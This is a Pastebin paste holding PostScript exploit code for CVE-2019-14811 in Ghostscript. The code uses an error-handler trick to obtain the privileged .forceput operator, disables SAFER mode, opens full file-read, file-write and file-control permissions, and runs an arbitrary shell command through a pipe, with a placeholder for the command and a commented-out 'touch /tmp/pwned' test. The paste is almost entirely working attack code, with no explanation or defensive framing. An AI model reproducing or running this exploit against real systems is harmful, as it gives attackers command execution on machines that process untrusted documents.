Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
- /exploit {{
- /println {{ (\\n) exch print print }} bind executeonly def
- /info {{ ([*] ) print println }} bind executeonly def
- /success {{ ([+] ) print println }} bind executeonly def
- /fail {{ ([-] ) print println stop }} bind executeonly def
- /MaxFileSize 16#10000 def
- /readfile {{
- (r) file
- dup MaxFileSize string readstring pop
- exch closefile
- }} bind executeonly def
- /osexec {{
- (%pipe%) exch concatstrings readfile
- }} bind executeonly def
- (=============================================================================)
- (= CVE-2019-14811 =)
- (=============================================================================)
- println println println
- (Obtaining .forceput operator from .pdf_hook_DSC_Creator operator...) info
- /.forceput null def
- systemdict /.pdfdsc get 24 get /.pdf_hook_DSC_Creator exch def
- /typecheckcount 0 def
- /&typecheck errordict /typecheck get def
- errordict /typecheck {{
- /typecheckcount typecheckcount 1 add def
- typecheckcount 2 eq {{
- 1 index 2 get 8 get
- /.forceput exch store
- }} if
- }} put
- null .pdf_hook_DSC_Creator clear
- errordict /typecheck /&typecheck load put
- [
- /&typecheck
- /typecheckcount
- /.pdf_hook_DSC_Creator
- ] {{ currentdict exch undef }} forall
- (A candidate for .forceput operator found!) success
- (Attempting sanity check with the candidate for .forceput operator...) info
- << /overwritten false >> readonly
- begin
- currentdict /overwritten true .forceput
- overwritten not {{
- /.forceput where {{ /.forceput undef }} if
- }} if
- end
- currentdict /.forceput known not {{
- (.forceput operator could not found...) fail
- }} if
- (Successfully got .forceput operator!) success
- (Overwriting several flags to escape from Safer Mode...) info
- systemdict /SAFER false .forceput
- userparams /LockFilePermissions false .forceput
- userparams /PermitFileControl [(*)] .forceput
- userparams /PermitFileWriting [(*)] .forceput
- userparams /PermitFileReading [(*)] .forceput
- save restore
- SAFER {{
- (Could not escape from Safer Mode.) fail
- }} bind executeonly if
- (Successfully escaped from Safer Mode!) success
- (Executing a shell command...) info
- ({cmd}) osexec pop
- % (touch /tmp/pwned) osexec pop
- (PS: I pwned you <3) success
- }} def
- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement